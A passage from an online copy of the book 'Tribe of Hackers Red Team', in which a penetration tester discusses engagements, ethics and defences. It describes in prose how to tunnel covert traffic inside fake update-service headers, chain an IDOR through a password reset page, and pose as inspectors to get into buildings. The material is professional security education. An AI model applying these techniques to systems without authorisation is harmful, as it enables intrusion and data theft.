Tribe of Hackers Red Team. Marcus J. Carey

Чтение книги онлайн.

Читать онлайн книгу Tribe of Hackers Red Team - Marcus J. Carey страница 23

Tribe of Hackers Red Team - Marcus J. Carey

Скачать книгу

that these things sell so well, though it’s certainly understandable. The people making these purchase decisions just don’t know what’s possible.

      They’re also paying me tons of money to walk into their network and wrap other protocols in unintelligible data globs sent as part of HTTP proxied traffic. This recently popped up on a test, where a client had exactly this technology in place. I just built a fake “update service” that polled a remote “update server” at random intervals, sending and receiving X-API-Key headers that contained arbitrary base64-encoded data. Normally such headers contain random strings encoded base64 or hex. In this case, we just piped any protocol/content of our choosing into that area.

      For higher per-packet data throughput, we could have easily utilized a fake JWT/JWS-style header value containing multiple such random strings in the body tunneling data, with a fake signature section tunneling more data—or even better, a “JWT/JWE” wherein the encrypted body is entirely ours to play with.

       Have you ever recommended not doing a red team engagement?

      I’ve gotten right in the front door with a few companies. When that happens, often the rest of the test is a waste. Sometimes it’s just an honest mistake—something like a default password left on an administrator account. That stuff happens even with high-level application developers (you wouldn’t believe who). But more often than not, a test like this just becomes a slaughter because of the architectural failures of an application or system in general.

      I’ve watched applications literally unravel from within by means of insecure direct object references (IDORs). The developers thought that it was fine to perform no authN/authZ prior to object access as long as the object IDs were long and random. Hint: that is almost never okay. In the specific case I’m thinking of, you could request a series of tokens if you knew only one starting tokenized value. They assumed you could get that token only if you were logged in as the user it belonged to. It turned out that you could find the token by requesting their password reset page with the user’s email and then pull down a series of chained requests to compromise everything that belonged to the user.

      In these architectural cases, the offer isn’t to continue red teaming them. The offer is to help them rebuild their application from the ground up with a member of our team working with them to ensure they make valid security decisions.

       What’s the most important or easiest-to-implement control that can prevent you from compromising a system or network?

      One hundred percent client (host) isolation. Unless the systems on your network absolutely must be talking to each other, you need to implement this, and you need to do it now. Especially in the modern world of AWS, GCP, and Azure, your business applications aren’t living on-premises. They’re living somewhere else, accessed via an external pipe that exits your LAN/WAN. Few organizations have any need for workstations to talk directly to each other. Not only is this functionality all but useless in most business use cases, implementing isolation stops a huge number of attacks that we would otherwise be able to leverage to gain access to and exploit your network resources. Without device-to-device access, how am I supposed to find and exploit unpatched servers or workstations on your network? How am I supposed to pivot laterally? How am I supposed to relay credentials or access a rogue SMB shared directory? You implement isolation, and I guarantee you will watch red teams fail.

       Why do you feel it is critical to stay within the rules of engagement?

      When it comes to causing harm, that’s a huge no-brainer. You want to have a job? You want people to trust you? You want to not be in jail? However, I think people often get tripped up over some of the gentler rules surrounding things like scope and attack types. These are the gray areas where it’s easier to just let things slide. You shouldn’t do this. Don’t let it slide, and don’t purposely play in the gray areas. Here’s what you need to do.

      Have an open chain of communication with your client through which you can easily reach out at any time. When you bump into a gray area, don’t just keep going. Reach out to your client and request clarification. If the rules of engagement or the project scope isn’t matching the reality of the application/network/system, renegotiate it.

      “Have an open chain of communication with your client through which you can easily reach out at any time.”

      Literally everything is up for negotiation. Talk with people.

       If you were ever busted on a penetration test or other engagement, how did you handle it?

      I’ve never managed to get hard busted, yet though I’ve heard some great stories. I seem to be pretty good at living off the land to avoid detection in network pivots. As a result, I rarely get noticed by network security teams. When I’m blocked during external tests, I literally just round-robin out of their way and back into attacking.

      I was stopped from entering a building once during a physical penetration test. I wouldn’t say that they “caught us” as much as their security procedures didn’t allow random people who showed up at the gate claiming to be “mold inspectors” to enter without a signed work order waiting for them. They asked us to head down to the security office, and they left me and my partner alone in their control room with just one guard checking out our credentials on his computer. When he didn’t find our fake mold inspector badges listed for entry, he simply asked us to leave.

      I know it’s not a crazy cool story. But hey, maybe if you’re nervous about how hard some of the heart-pumping, adrenaline-inducing portions of red teaming might be, even getting caught isn’t always that bad. In the end, they just asked us to leave. We flew to another state and broke into a different facility for the same company.

       What is the biggest ethical quandary you experienced while on an assigned objective?

      “Should I report this to the vendor?” is a huge one, especially when it involves systems that you know are in production globally at a massive scale. The moral penalty for not reporting can be huge. But, there are certainly situations in which you’ll find yourself locked into an NDA that limits your ability to share findings with a third party. In this case, it’s often best to work with your client and have them report or permit a redacted report to be transmitted to the selected third party. This is yet another reason that it’s good to have great clients. It’s important to choose who you work with.

       How does the red team work together to get the job done?

      I think within red teams it’s a huge hindrance that must necessarily be overcome. The work that we do is incredibly complex and terribly high in specificity. Especially when you bring in the issues that our perspective often adds to our tasks. We don’t usually have a control console flashing lights and outputting debug information to tell us what a system is doing internally as we interrogate it. Instead, we have to work out what’s happening inside by tracking huge numbers of variables indicated by external responses (such as error messages). Communicating exactly

Скачать книгу